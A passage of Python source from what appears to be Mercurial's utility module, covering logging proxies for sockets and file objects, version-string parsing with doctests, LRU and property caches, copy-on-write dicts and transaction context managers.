706 706 orig = object.__getattribute__(self, r'_orig')
707 707 res = getattr(orig, name)(*args, **kwargs)
708 708
709 709 # Call a method on the observer of the same name with arguments
710 710 # so it can react, log, etc.
711 711 observer = object.__getattribute__(self, r'_observer')
712 712 fn = getattr(observer, name, None)
713 713 if fn:
714 714 fn(res, *args, **kwargs)
715 715
716 716 return res
717 717
718 718 def makefile(self, *args, **kwargs):
719 719 res = object.__getattribute__(self, r'_observedcall')(
720 720 r'makefile', *args, **kwargs
721 721 )
722 722
723 723 # The file object may be used for I/O. So we turn it into a
724 724 # proxy using our observer.
725 725 observer = object.__getattribute__(self, r'_observer')
726 726 return makeloggingfileobject(
727 727 observer.fh,
728 728 res,
729 729 observer.name,
730 730 reads=observer.reads,
731 731 writes=observer.writes,
732 732 logdata=observer.logdata,
733 733 logdataapis=observer.logdataapis,
734 734 )
735 735
736 736 def recv(self, *args, **kwargs):
737 737 return object.__getattribute__(self, r'_observedcall')(
738 738 r'recv', *args, **kwargs
739 739 )
740 740
741 741 def recvfrom(self, *args, **kwargs):
742 742 return object.__getattribute__(self, r'_observedcall')(
743 743 r'recvfrom', *args, **kwargs
744 744 )
745 745
746 746 def recvfrom_into(self, *args, **kwargs):
747 747 return object.__getattribute__(self, r'_observedcall')(
748 748 r'recvfrom_into', *args, **kwargs
749 749 )
750 750
751 751 def recv_into(self, *args, **kwargs):
752 752 return object.__getattribute__(self, r'_observedcall')(
753 753 r'recv_info', *args, **kwargs
754 754 )
755 755
756 756 def send(self, *args, **kwargs):
757 757 return object.__getattribute__(self, r'_observedcall')(
758 758 r'send', *args, **kwargs
759 759 )
760 760
761 761 def sendall(self, *args, **kwargs):
762 762 return object.__getattribute__(self, r'_observedcall')(
763 763 r'sendall', *args, **kwargs
764 764 )
765 765
766 766 def sendto(self, *args, **kwargs):
767 767 return object.__getattribute__(self, r'_observedcall')(
768 768 r'sendto', *args, **kwargs
769 769 )
770 770
771 771 def setblocking(self, *args, **kwargs):
772 772 return object.__getattribute__(self, r'_observedcall')(
773 773 r'setblocking', *args, **kwargs
774 774 )
775 775
776 776 def settimeout(self, *args, **kwargs):
777 777 return object.__getattribute__(self, r'_observedcall')(
778 778 r'settimeout', *args, **kwargs
779 779 )
780 780
781 781 def gettimeout(self, *args, **kwargs):
782 782 return object.__getattribute__(self, r'_observedcall')(
783 783 r'gettimeout', *args, **kwargs
784 784 )
785 785
786 786 def setsockopt(self, *args, **kwargs):
787 787 return object.__getattribute__(self, r'_observedcall')(
788 788 r'setsockopt', *args, **kwargs
789 789 )
790 790
791 791
792 792 class baseproxyobserver(object):
793 793 def _writedata(self, data):
794 794 if not self.logdata:
795 795 if self.logdataapis:
796 796 self.fh.write(b'\n')
797 797 self.fh.flush()
798 798 return
799 799
800 800 # Simple case writes all data on a single line.
801 801 if b'\n' not in data:
802 802 if self.logdataapis:
803 803 self.fh.write(b': %s\n' % stringutil.escapestr(data))
804 804 else:
805 805 self.fh.write(
806 806 b'%s> %s\n' % (self.name, stringutil.escapestr(data))
807 807 )
808 808 self.fh.flush()
809 809 return
810 810
811 811 # Data with newlines is written to multiple lines.
812 812 if self.logdataapis:
813 813 self.fh.write(b':\n')
814 814
815 815 lines = data.splitlines(True)
816 816 for line in lines:
817 817 self.fh.write(
818 818 b'%s> %s\n' % (self.name, stringutil.escapestr(line))
819 819 )
820 820 self.fh.flush()
821 821
822 822
823 823 class fileobjectobserver(baseproxyobserver):
824 824 """Logs file object activity."""
825 825
826 826 def __init__(
827 827 self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
828 828 ):
829 829 self.fh = fh
830 830 self.name = name
831 831 self.logdata = logdata
832 832 self.logdataapis = logdataapis
833 833 self.reads = reads
834 834 self.writes = writes
835 835
836 836 def read(self, res, size=-1):
837 837 if not self.reads:
838 838 return
839 839 # Python 3 can return None from reads at EOF instead of empty strings.
840 840 if res is None:
841 841 res = b''
842 842
843 843 if size == -1 and res == b'':
844 844 # Suppress pointless read(-1) calls that return
845 845 # nothing. These happen _a lot_ on Python 3, and there
846 846 # doesn't seem to be a better workaround to have matching
847 847 # Python 2 and 3 behavior. :(
848 848 return
849 849
850 850 if self.logdataapis:
851 851 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
852 852
853 853 self._writedata(res)
854 854
855 855 def readline(self, res, limit=-1):
856 856 if not self.reads:
857 857 return
858 858
859 859 if self.logdataapis:
860 860 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
861 861
862 862 self._writedata(res)
863 863
864 864 def readinto(self, res, dest):
865 865 if not self.reads:
866 866 return
867 867
868 868 if self.logdataapis:
869 869 self.fh.write(
870 870 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
871 871 )
872 872
873 873 data = dest[0:res] if res is not None else b''
874 874
875 875 # _writedata() uses "in" operator and is confused by memoryview because
876 876 # characters are ints on Python 3.
877 877 if isinstance(data, memoryview):
878 878 data = data.tobytes()
879 879
880 880 self._writedata(data)
881 881
882 882 def write(self, res, data):
883 883 if not self.writes:
884 884 return
885 885
886 886 # Python 2 returns None from some write() calls. Python 3 (reasonably)
887 887 # returns the integer bytes written.
888 888 if res is None and data:
889 889 res = len(data)
890 890
891 891 if self.logdataapis:
892 892 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
893 893
894 894 self._writedata(data)
895 895
896 896 def flush(self, res):
897 897 if not self.writes:
898 898 return
899 899
900 900 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
901 901
902 902 # For observedbufferedinputpipe.
903 903 def bufferedread(self, res, size):
904 904 if not self.reads:
905 905 return
906 906
907 907 if self.logdataapis:
908 908 self.fh.write(
909 909 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
910 910 )
911 911
912 912 self._writedata(res)
913 913
914 914 def bufferedreadline(self, res):
915 915 if not self.reads:
916 916 return
917 917
918 918 if self.logdataapis:
919 919 self.fh.write(
920 920 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
921 921 )
922 922
923 923 self._writedata(res)
924 924
925 925
926 926 def makeloggingfileobject(
927 927 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
928 928 ):
929 929 """Turn a file object into a logging file object."""
930 930
931 931 observer = fileobjectobserver(
932 932 logh,
933 933 name,
934 934 reads=reads,
935 935 writes=writes,
936 936 logdata=logdata,
937 937 logdataapis=logdataapis,
938 938 )
939 939 return fileobjectproxy(fh, observer)
940 940
941 941
942 942 class socketobserver(baseproxyobserver):
943 943 """Logs socket activity."""
944 944
945 945 def __init__(
946 946 self,
947 947 fh,
948 948 name,
949 949 reads=True,
950 950 writes=True,
951 951 states=True,
952 952 logdata=False,
953 953 logdataapis=True,
954 954 ):
955 955 self.fh = fh
956 956 self.name = name
957 957 self.reads = reads
958 958 self.writes = writes
959 959 self.states = states
960 960 self.logdata = logdata
961 961 self.logdataapis = logdataapis
962 962
963 963 def makefile(self, res, mode=None, bufsize=None):
964 964 if not self.states:
965 965 return
966 966
967 967 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
968 968
969 969 def recv(self, res, size, flags=0):
970 970 if not self.reads:
971 971 return
972 972
973 973 if self.logdataapis:
974 974 self.fh.write(
975 975 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
976 976 )
977 977 self._writedata(res)
978 978
979 979 def recvfrom(self, res, size, flags=0):
980 980 if not self.reads:
981 981 return
982 982
983 983 if self.logdataapis:
984 984 self.fh.write(
985 985 b'%s> recvfrom(%d, %d) -> %d'
986 986 % (self.name, size, flags, len(res[0]))
987 987 )
988 988
989 989 self._writedata(res[0])
990 990
991 991 def recvfrom_into(self, res, buf, size, flags=0):
992 992 if not self.reads:
993 993 return
994 994
995 995 if self.logdataapis:
996 996 self.fh.write(
997 997 b'%s> recvfrom_into(%d, %d) -> %d'
998 998 % (self.name, size, flags, res[0])
999 999 )
1000 1000
1001 1001 self._writedata(buf[0 : res[0]])
1002 1002
1003 1003 def recv_into(self, res, buf, size=0, flags=0):
1004 1004 if not self.reads:
1005 1005 return
1006 1006
1007 1007 if self.logdataapis:
1008 1008 self.fh.write(
1009 1009 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1010 1010 )
1011 1011
1012 1012 self._writedata(buf[0:res])
1013 1013
1014 1014 def send(self, res, data, flags=0):
1015 1015 if not self.writes:
1016 1016 return
1017 1017
1018 1018 self.fh.write(
1019 1019 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1020 1020 )
1021 1021 self._writedata(data)
1022 1022
1023 1023 def sendall(self, res, data, flags=0):
1024 1024 if not self.writes:
1025 1025 return
1026 1026
1027 1027 if self.logdataapis:
1028 1028 # Returns None on success. So don't bother reporting return value.
1029 1029 self.fh.write(
1030 1030 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1031 1031 )
1032 1032
1033 1033 self._writedata(data)
1034 1034
1035 1035 def sendto(self, res, data, flagsoraddress, address=None):
1036 1036 if not self.writes:
1037 1037 return
1038 1038
1039 1039 if address:
1040 1040 flags = flagsoraddress
1041 1041 else:
1042 1042 flags = 0
1043 1043
1044 1044 if self.logdataapis:
1045 1045 self.fh.write(
1046 1046 b'%s> sendto(%d, %d, %r) -> %d'
1047 1047 % (self.name, len(data), flags, address, res)
1048 1048 )
1049 1049
1050 1050 self._writedata(data)
1051 1051
1052 1052 def setblocking(self, res, flag):
1053 1053 if not self.states:
1054 1054 return
1055 1055
1056 1056 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1057 1057
1058 1058 def settimeout(self, res, value):
1059 1059 if not self.states:
1060 1060 return
1061 1061
1062 1062 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1063 1063
1064 1064 def gettimeout(self, res):
1065 1065 if not self.states:
1066 1066 return
1067 1067
1068 1068 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1069 1069
1070 1070 def setsockopt(self, res, level, optname, value):
1071 1071 if not self.states:
1072 1072 return
1073 1073
1074 1074 self.fh.write(
1075 1075 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1076 1076 % (self.name, level, optname, value, res)
1077 1077 )
1078 1078
1079 1079
1080 1080 def makeloggingsocket(
1081 1081 logh,
1082 1082 fh,
1083 1083 name,
1084 1084 reads=True,
1085 1085 writes=True,
1086 1086 states=True,
1087 1087 logdata=False,
1088 1088 logdataapis=True,
1089 1089 ):
1090 1090 """Turn a socket into a logging socket."""
1091 1091
1092 1092 observer = socketobserver(
1093 1093 logh,
1094 1094 name,
1095 1095 reads=reads,
1096 1096 writes=writes,
1097 1097 states=states,
1098 1098 logdata=logdata,
1099 1099 logdataapis=logdataapis,
1100 1100 )
1101 1101 return socketproxy(fh, observer)
1102 1102
1103 1103
1104 1104 def version():
1105 1105 """Return version information if available."""
1106 1106 try:
1107 1107 from . import __version__
1108 1108
1109 1109 return __version__.version
1110 1110 except ImportError:
1111 1111 return b'unknown'
1112 1112
1113 1113
1114 1114 def versiontuple(v=None, n=4):
1115 1115 """Parses a Mercurial version string into an N-tuple.
1116 1116
1117 1117 The version string to be parsed is specified with the ``v`` argument.
1118 1118 If it isn't defined, the current Mercurial version string will be parsed.
1119 1119
1120 1120 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1121 1121 returned values:
1122 1122
1123 1123 >>> v = b'3.6.1+190-df9b73d2d444'
1124 1124 >>> versiontuple(v, 2)
1125 1125 (3, 6)
1126 1126 >>> versiontuple(v, 3)
1127 1127 (3, 6, 1)
1128 1128 >>> versiontuple(v, 4)
1129 1129 (3, 6, 1, '190-df9b73d2d444')
1130 1130
1131 1131 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1132 1132 (3, 6, 1, '190-df9b73d2d444+20151118')
1133 1133
1134 1134 >>> v = b'3.6'
1135 1135 >>> versiontuple(v, 2)
1136 1136 (3, 6)
1137 1137 >>> versiontuple(v, 3)
1138 1138 (3, 6, None)
1139 1139 >>> versiontuple(v, 4)
1140 1140 (3, 6, None, None)
1141 1141
1142 1142 >>> v = b'3.9-rc'
1143 1143 >>> versiontuple(v, 2)
1144 1144 (3, 9)
1145 1145 >>> versiontuple(v, 3)
1146 1146 (3, 9, None)
1147 1147 >>> versiontuple(v, 4)
1148 1148 (3, 9, None, 'rc')
1149 1149
1150 1150 >>> v = b'3.9-rc+2-02a8fea4289b'
1151 1151 >>> versiontuple(v, 2)
1152 1152 (3, 9)
1153 1153 >>> versiontuple(v, 3)
1154 1154 (3, 9, None)
1155 1155 >>> versiontuple(v, 4)
1156 1156 (3, 9, None, 'rc+2-02a8fea4289b')
1157 1157
1158 1158 >>> versiontuple(b'4.6rc0')
1159 1159 (4, 6, None, 'rc0')
1160 1160 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1161 1161 (4, 6, None, 'rc0+12-425d55e54f98')
1162 1162 >>> versiontuple(b'.1.2.3')
1163 1163 (None, None, None, '.1.2.3')
1164 1164 >>> versiontuple(b'12.34..5')
1165 1165 (12, 34, None, '..5')
1166 1166 >>> versiontuple(b'1.2.3.4.5.6')
1167 1167 (1, 2, 3, '.4.5.6')
1168 1168 """
1169 1169 if not v:
1170 1170 v = version()
1171 1171 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1172 1172 if not m:
1173 1173 vparts, extra = b'', v
1174 1174 elif m.group(2):
1175 1175 vparts, extra = m.groups()
1176 1176 else:
1177 1177 vparts, extra = m.group(1), None
1178 1178
1179 1179 vints = []
1180 1180 for i in vparts.split(b'.'):
1181 1181 try:
1182 1182 vints.append(int(i))
1183 1183 except ValueError:
1184 1184 break
1185 1185 # (3, 6) -> (3, 6, None)
1186 1186 while len(vints) < 3:
1187 1187 vints.append(None)
1188 1188
1189 1189 if n == 2:
1190 1190 return (vints[0], vints[1])
1191 1191 if n == 3:
1192 1192 return (vints[0], vints[1], vints[2])
1193 1193 if n == 4:
1194 1194 return (vints[0], vints[1], vints[2], extra)
1195 1195
1196 1196
1197 1197 def cachefunc(func):
1198 1198 '''cache the result of function calls'''
1199 1199 # XXX doesn't handle keywords args
1200 1200 if func.__code__.co_argcount == 0:
1201 1201 cache = []
1202 1202
1203 1203 def f():
1204 1204 if len(cache) == 0:
1205 1205 cache.append(func())
1206 1206 return cache[0]
1207 1207
1208 1208 return f
1209 1209 cache = {}
1210 1210 if func.__code__.co_argcount == 1:
1211 1211 # we gain a small amount of time because
1212 1212 # we don't need to pack/unpack the list
1213 1213 def f(arg):
1214 1214 if arg not in cache:
1215 1215 cache[arg] = func(arg)
1216 1216 return cache[arg]
1217 1217
1218 1218 else:
1219 1219
1220 1220 def f(*args):
1221 1221 if args not in cache:
1222 1222 cache[args] = func(*args)
1223 1223 return cache[args]
1224 1224
1225 1225 return f
1226 1226
1227 1227
1228 1228 class cow(object):
1229 1229 """helper class to make copy-on-write easier
1230 1230
1231 1231 Call preparewrite before doing any writes.
1232 1232 """
1233 1233
1234 1234 def preparewrite(self):
1235 1235 """call this before writes, return self or a copied new object"""
1236 1236 if getattr(self, '_copied', 0):
1237 1237 self._copied -= 1
1238 1238 return self.__class__(self)
1239 1239 return self
1240 1240
1241 1241 def copy(self):
1242 1242 """always do a cheap copy"""
1243 1243 self._copied = getattr(self, '_copied', 0) + 1
1244 1244 return self
1245 1245
1246 1246
1247 1247 class sortdict(collections.OrderedDict):
1248 1248 '''a simple sorted dictionary
1249 1249
1250 1250 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1251 1251 >>> d2 = d1.copy()
1252 1252 >>> d2
1253 1253 sortdict([('a', 0), ('b', 1)])
1254 1254 >>> d2.update([(b'a', 2)])
1255 1255 >>> list(d2.keys()) # should still be in last-set order
1256 1256 ['b', 'a']
1257 1257 '''
1258 1258
1259 1259 def __setitem__(self, key, value):
1260 1260 if key in self:
1261 1261 del self[key]
1262 1262 super(sortdict, self).__setitem__(key, value)
1263 1263
1264 1264 if pycompat.ispypy:
1265 1265 # __setitem__() isn't called as of PyPy 5.8.0
1266 1266 def update(self, src):
1267 1267 if isinstance(src, dict):
1268 1268 src = pycompat.iteritems(src)
1269 1269 for k, v in src:
1270 1270 self[k] = v
1271 1271
1272 1272
1273 1273 class cowdict(cow, dict):
1274 1274 """copy-on-write dict
1275 1275
1276 1276 Be sure to call d = d.preparewrite() before writing to d.
1277 1277
1278 1278 >>> a = cowdict()
1279 1279 >>> a is a.preparewrite()
1280 1280 True
1281 1281 >>> b = a.copy()
1282 1282 >>> b is a
1283 1283 True
1284 1284 >>> c = b.copy()
1285 1285 >>> c is a
1286 1286 True
1287 1287 >>> a = a.preparewrite()
1288 1288 >>> b is a
1289 1289 False
1290 1290 >>> a is a.preparewrite()
1291 1291 True
1292 1292 >>> c = c.preparewrite()
1293 1293 >>> b is c
1294 1294 False
1295 1295 >>> b is b.preparewrite()
1296 1296 True
1297 1297 """
1298 1298
1299 1299
1300 1300 class cowsortdict(cow, sortdict):
1301 1301 """copy-on-write sortdict
1302 1302
1303 1303 Be sure to call d = d.preparewrite() before writing to d.
1304 1304 """
1305 1305
1306 1306
1307 1307 class transactional(object): # pytype: disable=ignored-metaclass
1308 1308 """Base class for making a transactional type into a context manager."""
1309 1309
1310 1310 __metaclass__ = abc.ABCMeta
1311 1311
1312 1312 @abc.abstractmethod
1313 1313 def close(self):
1314 1314 """Successfully closes the transaction."""
1315 1315
1316 1316 @abc.abstractmethod
1317 1317 def release(self):
1318 1318 """Marks the end of the transaction.
1319 1319
1320 1320 If the transaction has not been closed, it will be aborted.
1321 1321 """
1322 1322
1323 1323 def __enter__(self):
1324 1324 return self
1325 1325
1326 1326 def __exit__(self, exc_type, exc_val, exc_tb):
1327 1327 try:
1328 1328 if exc_type is None:
1329 1329 self.close()
1330 1330 finally:
1331 1331 self.release()
1332 1332
1333 1333
1334 1334 @contextlib.contextmanager
1335 1335 def acceptintervention(tr=None):
1336 1336 """A context manager that closes the transaction on InterventionRequired
1337 1337
1338 1338 If no transaction was provided, this simply runs the body and returns
1339 1339 """
1340 1340 if not tr:
1341 1341 yield
1342 1342 return
1343 1343 try:
1344 1344 yield
1345 1345 tr.close()
1346 1346 except error.InterventionRequired:
1347 1347 tr.close()
1348 1348 raise
1349 1349 finally:
1350 1350 tr.release()
1351 1351
1352 1352
1353 1353 @contextlib.contextmanager
1354 1354 def nullcontextmanager():
1355 1355 yield
1356 1356
1357 1357
1358 1358 class _lrucachenode(object):
1359 1359 """A node in a doubly linked list.
1360 1360
1361 1361 Holds a reference to nodes on either side as well as a key-value
1362 1362 pair for the dictionary entry.
1363 1363 """
1364 1364
1365 1365 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1366 1366
1367 1367 def __init__(self):
1368 1368 self.next = None
1369 1369 self.prev = None
1370 1370
1371 1371 self.key = _notset
1372 1372 self.value = None
1373 1373 self.cost = 0
1374 1374
1375 1375 def markempty(self):
1376 1376 """Mark the node as emptied."""
1377 1377 self.key = _notset
1378 1378 self.value = None
1379 1379 self.cost = 0
1380 1380
1381 1381
1382 1382 class lrucachedict(object):
1383 1383 """Dict that caches most recent accesses and sets.
1384 1384
1385 1385 The dict consists of an actual backing dict - indexed by original
1386 1386 key - and a doubly linked circular list defining the order of entries in
1387 1387 the cache.
1388 1388
1389 1389 The head node is the newest entry in the cache. If the cache is full,
1390 1390 we recycle head.prev and make it the new head. Cache accesses result in
1391 1391 the node being moved to before the existing head and being marked as the
1392 1392 new head node.
1393 1393
1394 1394 Items in the cache can be inserted with an optional "cost" value. This is
1395 1395 simply an integer that is specified by the caller. The cache can be queried
1396 1396 for the total cost of all items presently in the cache.
1397 1397
1398 1398 The cache can also define a maximum cost. If a cache insertion would
1399 1399 cause the total cost of the cache to go beyond the maximum cost limit,
1400 1400 nodes will be evicted to make room for the new code. This can be used
1401 1401 to e.g. set a max memory limit and associate an estimated bytes size
1402 1402 cost to each item in the cache. By default, no maximum cost is enforced.
1403 1403 """
1404 1404
1405 1405 def __init__(self, max, maxcost=0):
1406 1406 self._cache = {}
1407 1407
1408 1408 self._head = head = _lrucachenode()
1409 1409 head.prev = head
1410 1410 head.next = head
1411 1411 self._size = 1
1412 1412 self.capacity = max
1413 1413 self.totalcost = 0
1414 1414 self.maxcost = maxcost
1415 1415
1416 1416 def __len__(self):
1417 1417 return len(self._cache)
1418 1418
1419 1419 def __contains__(self, k):
1420 1420 return k in self._cache
1421 1421
1422 1422 def __iter__(self):
1423 1423 # We don't have to iterate in cache order, but why not.
1424 1424 n = self._head
1425 1425 for i in range(len(self._cache)):
1426 1426 yield n.key
1427 1427 n = n.next
1428 1428
1429 1429 def __getitem__(self, k):
1430 1430 node = self._cache[k]
1431 1431 self._movetohead(node)
1432 1432 return node.value
1433 1433
1434 1434 def insert(self, k, v, cost=0):
1435 1435 """Insert a new item in the cache with optional cost value."""
1436 1436 node = self._cache.get(k)
1437 1437 # Replace existing value and mark as newest.
1438 1438 if node is not None:
1439 1439 self.totalcost -= node.cost
1440 1440 node.value = v
1441 1441 node.cost = cost
1442 1442 self.totalcost += cost
1443 1443 self._movetohead(node)
1444 1444
1445 1445 if self.maxcost:
1446 1446 self._enforcecostlimit()
1447 1447
1448 1448 return
1449 1449
1450 1450 if self._size < self.capacity:
1451 1451 node = self._addcapacity()
1452 1452 else:
1453 1453 # Grab the last/oldest item.
1454 1454 node = self._head.prev
1455 1455
1456 1456 # At capacity. Kill the old entry.
1457 1457 if node.key is not _notset:
1458 1458 self.totalcost -= node.cost
1459 1459 del self._cache[node.key]
1460 1460
1461 1461 node.key = k
1462 1462 node.value = v
1463 1463 node.cost = cost
1464 1464 self.totalcost += cost
1465 1465 self._cache[k] = node
1466 1466 # And mark it as newest entry. No need to adjust order since it
1467 1467 # is already self._head.prev.
1468 1468 self._head = node
1469 1469
1470 1470 if self.maxcost:
1471 1471 self._enforcecostlimit()
1472 1472
1473 1473 def __setitem__(self, k, v):
1474 1474 self.insert(k, v)
1475 1475
1476 1476 def __delitem__(self, k):
1477 1477 self.pop(k)
1478 1478
1479 1479 def pop(self, k, default=_notset):
1480 1480 try:
1481 1481 node = self._cache.pop(k)
1482 1482 except KeyError:
1483 1483 if default is _notset:
1484 1484 raise
1485 1485 return default
1486 1486 value = node.value
1487 1487 self.totalcost -= node.cost
1488 1488 node.markempty()
1489 1489
1490 1490 # Temporarily mark as newest item before re-adjusting head to make
1491 1491 # this node the oldest item.
1492 1492 self._movetohead(node)
1493 1493 self._head = node.next
1494 1494
1495 1495 return value
1496 1496
1497 1497 # Additional dict methods.
1498 1498
1499 1499 def get(self, k, default=None):
1500 1500 try:
1501 1501 return self.__getitem__(k)
1502 1502 except KeyError:
1503 1503 return default
1504 1504
1505 1505 def peek(self, k, default=_notset):
1506 1506 """Get the specified item without moving it to the head
1507 1507
1508 1508 Unlike get(), this doesn't mutate the internal state. But be aware
1509 1509 that it doesn't mean peek() is thread safe.
1510 1510 """
1511 1511 try:
1512 1512 node = self._cache[k]
1513 1513 return node.value
1514 1514 except KeyError:
1515 1515 if default is _notset:
1516 1516 raise
1517 1517 return default
1518 1518
1519 1519 def clear(self):
1520 1520 n = self._head
1521 1521 while n.key is not _notset:
1522 1522 self.totalcost -= n.cost
1523 1523 n.markempty()
1524 1524 n = n.next
1525 1525
1526 1526 self._cache.clear()
1527 1527
1528 1528 def copy(self, capacity=None, maxcost=0):
1529 1529 """Create a new cache as a copy of the current one.
1530 1530
1531 1531 By default, the new cache has the same capacity as the existing one.
1532 1532 But, the cache capacity can be changed as part of performing the
1533 1533 copy.
1534 1534
1535 1535 Items in the copy have an insertion/access order matching this
1536 1536 instance.
1537 1537 """
1538 1538
1539 1539 capacity = capacity or self.capacity
1540 1540 maxcost = maxcost or self.maxcost
1541 1541 result = lrucachedict(capacity, maxcost=maxcost)
1542 1542
1543 1543 # We copy entries by iterating in oldest-to-newest order so the copy
1544 1544 # has the correct ordering.
1545 1545
1546 1546 # Find the first non-empty entry.
1547 1547 n = self._head.prev
1548 1548 while n.key is _notset and n is not self._head:
1549 1549 n = n.prev
1550 1550
1551 1551 # We could potentially skip the first N items when decreasing capacity.
1552 1552 # But let's keep it simple unless it is a performance problem.
1553 1553 for i in range(len(self._cache)):
1554 1554 result.insert(n.key, n.value, cost=n.cost)
1555 1555 n = n.prev
1556 1556
1557 1557 return result
1558 1558
1559 1559 def popoldest(self):
1560 1560 """Remove the oldest item from the cache.
1561 1561
1562 1562 Returns the (key, value) describing the removed cache entry.
1563 1563 """
1564 1564 if not self._cache:
1565 1565 return
1566 1566
1567 1567 # Walk the linked list backwards starting at tail node until we hit
1568 1568 # a non-empty node.
1569 1569 n = self._head.prev
1570 1570 while n.key is _notset:
1571 1571 n = n.prev
1572 1572
1573 1573 key, value = n.key, n.value
1574 1574
1575 1575 # And remove it from the cache and mark it as empty.
1576 1576 del self._cache[n.key]
1577 1577 self.totalcost -= n.cost
1578 1578 n.markempty()
1579 1579
1580 1580 return key, value
1581 1581
1582 1582 def _movetohead(self, node):
1583 1583 """Mark a node as the newest, making it the new head.
1584 1584
1585 1585 When a node is accessed, it becomes the freshest entry in the LRU
1586 1586 list, which is denoted by self._head.
1587 1587
1588 1588 Visually, let's make ``N`` the new head node (* denotes head):
1589 1589
1590 1590 previous/oldest <-> head <-> next/next newest
1591 1591
1592 1592 ----<->--- A* ---<->-----
1593 1593 | |
1594 1594 E <-> D <-> N <-> C <-> B
1595 1595
1596 1596 To:
1597 1597
1598 1598 ----<->--- N* ---<->-----
1599 1599 | |
1600 1600 E <-> D <-> C <-> B <-> A
1601 1601
1602 1602 This requires the following moves:
1603 1603
1604 1604 C.next = D (node.prev.next = node.next)
1605 1605 D.prev = C (node.next.prev = node.prev)
1606 1606 E.next = N (head.prev.next = node)
1607 1607 N.prev = E (node.prev = head.prev)
1608 1608 N.next = A (node.next = head)
1609 1609 A.prev = N (head.prev = node)
1610 1610 """
1611 1611 head = self._head
1612 1612 # C.next = D
1613 1613 node.prev.next = node.next
1614 1614 # D.prev = C
1615 1615 node.next.prev = node.prev
1616 1616 # N.prev = E
1617 1617 node.prev = head.prev
1618 1618 # N.next = A
1619 1619 # It is tempting to do just "head" here, however if node is
1620 1620 # adjacent to head, this will do bad things.
1621 1621 node.next = head.prev.next
1622 1622 # E.next = N
1623 1623 node.next.prev = node
1624 1624 # A.prev = N
1625 1625 node.prev.next = node
1626 1626
1627 1627 self._head = node
1628 1628
1629 1629 def _addcapacity(self):
1630 1630 """Add a node to the circular linked list.
1631 1631
1632 1632 The new node is inserted before the head node.
1633 1633 """
1634 1634 head = self._head
1635 1635 node = _lrucachenode()
1636 1636 head.prev.next = node
1637 1637 node.prev = head.prev
1638 1638 node.next = head
1639 1639 head.prev = node
1640 1640 self._size += 1
1641 1641 return node
1642 1642
1643 1643 def _enforcecostlimit(self):
1644 1644 # This should run after an insertion. It should only be called if total
1645 1645 # cost limits are being enforced.
1646 1646 # The most recently inserted node is never evicted.
1647 1647 if len(self) <= 1 or self.totalcost <= self.maxcost:
1648 1648 return
1649 1649
1650 1650 # This is logically equivalent to calling popoldest() until we
1651 1651 # free up enough cost. We don't do that since popoldest() needs
1652 1652 # to walk the linked list and doing this in a loop would be
1653 1653 # quadratic. So we find the first non-empty node and then
1654 1654 # walk nodes until we free up enough capacity.
1655 1655 #
1656 1656 # If we only removed the minimum number of nodes to free enough
1657 1657 # cost at insert time, chances are high that the next insert would
1658 1658 # also require pruning. This would effectively constitute quadratic
1659 1659 # behavior for insert-heavy workloads. To mitigate this, we set a
1660 1660 # target cost that is a percentage of the max cost. This will tend
1661 1661 # to free more nodes when the high water mark is reached, which
1662 1662 # lowers the chances of needing to prune on the subsequent insert.
1663 1663 targetcost = int(self.maxcost * 0.75)
1664 1664
1665 1665 n = self._head.prev
1666 1666 while n.key is _notset:
1667 1667 n = n.prev
1668 1668
1669 1669 while len(self) > 1 and self.totalcost > targetcost:
1670 1670 del self._cache[n.key]
1671 1671 self.totalcost -= n.cost
1672 1672 n.markempty()
1673 1673 n = n.prev
1674 1674
1675 1675
1676 1676 def lrucachefunc(func):
1677 1677 '''cache most recent results of function calls'''
1678 1678 cache = {}
1679 1679 order = collections.deque()
1680 1680 if func.__code__.co_argcount == 1:
1681 1681
1682 1682 def f(arg):
1683 1683 if arg not in cache:
1684 1684 if len(cache) > 20:
1685 1685 del cache[order.popleft()]
1686 1686 cache[arg] = func(arg)
1687 1687 else:
1688 1688 order.remove(arg)
1689 1689 order.append(arg)
1690 1690 return cache[arg]
1691 1691
1692 1692 else:
1693 1693
1694 1694 def f(*args):
1695 1695 if args not in cache:
1696 1696 if len(cache) > 20:
1697 1697 del cache[order.popleft()]
1698 1698 cache[args] = func(*args)
1699 1699 else:
1700 1700 order.remove(args)
1701 1701 order.append(args)
1702 1702 return cache[args]
1703 1703
1704 1704 return f
1705 1705
1706 1706
1707 1707 class propertycache(object):
1708 1708 def __init__(self, func):
1709 1709 self.func = func
1710 1710 self.name = func.__name__
1711 1711
1712 1712 def __get__(self, obj, type=None):
1713 1713 result = self.func(obj)
1714 1714 self.cachevalue(obj, result)
1715 1715 return result
1716 1716
1717 1717 def cachevalue(self, obj, value):
1718 1718 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1719 1719 obj.__dict__[self.name] = value
1720 1720
1721 1721
1722 1722 def clearcachedproperty(obj, prop):
1723 1723 '''clear a cached property value, if one has been set'''
1724 1724 prop = pycompat.sysstr(prop)
1725 1725 if prop in obj.__dict__:
1726 1726 del obj.__dict__[prop]
1727 1727
1728 1728
1729 1729 def increasingchunks(source, min=1024, max=65536):
1730 1730 '''return no less than min bytes per chunk while data remains,
1731 1731 doubling min after each chunk until it reaches max'''
1732 1732
